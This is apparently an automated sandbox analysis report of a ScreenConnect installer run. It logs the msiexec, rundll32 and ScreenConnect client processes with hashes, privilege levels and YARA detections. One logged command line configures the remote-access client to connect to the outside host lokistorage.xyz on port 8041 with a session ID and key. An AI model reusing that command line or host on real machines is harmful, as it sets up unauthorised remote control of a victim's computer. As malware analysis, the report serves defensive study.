Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1418481996.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1410867618.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	12:40:16
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
Imagebase:	0x860000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	12:40:17
Start date:	12/11/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff76f660000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	12:40:18
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding A147D8F4A2A0D4F5C5A36F7D0C7BF249 C
Imagebase:	0x860000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	12:40:19
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4293031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Imagebase:	0xc20000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	12:40:23
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 52881A0F31505AA001D51A2B2FDDE9ED
Imagebase:	0x860000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	12:40:23
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 4081353BA27C3192F1069208B3FE053F E Global\MSI0000
Imagebase:	0x860000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	12:40:23
Start date:	12/11/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Slawomirkowalski&c=PL&c=KUC&c=&c=&c=&c=&c=&c="
Imagebase:	0x260000
File size:	95'520 bytes
MD5 hash:	826314610D9E854477B08666330940B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Target ID:	9
Start time:	12:40:25
Start date:	12/11/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "6499763b-8fe0-474c-8e02-22f9c957ab00" "User"
Imagebase:	0xd0000
File size:	598'816 bytes
MD5 hash:	AB5FA8D90645878D587F386D0E276C02
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Target ID:	10
Start time:	12:40:27
Start date:	12/11/2024
Path:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "f01c433b-e368-416e-a09f-c16bb2e654cf" "System"
Imagebase:	0x700000
File size:	598'816 bytes
MD5 hash:	AB5FA8D90645878D587F386D0E276C02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true